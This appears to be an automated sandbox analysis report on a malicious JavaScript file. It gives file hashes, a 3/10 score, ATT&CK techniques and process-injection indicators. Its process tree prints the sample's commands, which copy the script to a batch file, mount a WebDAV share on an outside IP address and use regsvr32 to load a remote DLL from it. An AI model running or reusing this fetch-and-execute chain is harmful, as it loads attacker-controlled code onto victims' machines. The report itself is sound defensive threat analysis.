0ca785b11cb44c43be9ef5b921c85e15d450c4caf86ca2ac9bec1fc8f571d441

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
08/07/2024, 04:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1850166781191324920.js
Size

5KB
MD5

33301c9fd5a47289e0eff7062eb98c94
SHA1

b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a
SHA256

3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c
SHA512

67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0
SSDEEP

96:yfbvUIOO8hX7IOO8h8GoM/prtxJcqSGZTt6LWhJPNvhzALk8oOkP8o9:yPOO8SOO82m/Jtx7SGvtlSkP5

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2596	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 1736	2156	wscript.exe	30
PID 2156 wrote to memory of 1736	2156	wscript.exe	30
PID 2156 wrote to memory of 1736	2156	wscript.exe	30
PID 1736 wrote to memory of 2248	1736	cmd.exe	32
PID 1736 wrote to memory of 2248	1736	cmd.exe	32
PID 1736 wrote to memory of 2248	1736	cmd.exe	32
PID 1736 wrote to memory of 2596	1736	cmd.exe	33
PID 1736 wrote to memory of 2596	1736	cmd.exe	33
PID 1736 wrote to memory of 2596	1736	cmd.exe	33
PID 1736 wrote to memory of 2596	1736	cmd.exe	33
PID 1736 wrote to memory of 2596	1736	cmd.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js" "C:\Users\Admin\\fwauam.bat" && "C:\Users\Admin\\fwauam.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:2248
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\895.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\fwauam.bat

Filesize
5KB

MD5
33301c9fd5a47289e0eff7062eb98c94

SHA1
b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a

SHA256
3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c

SHA512
67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0

Download Submit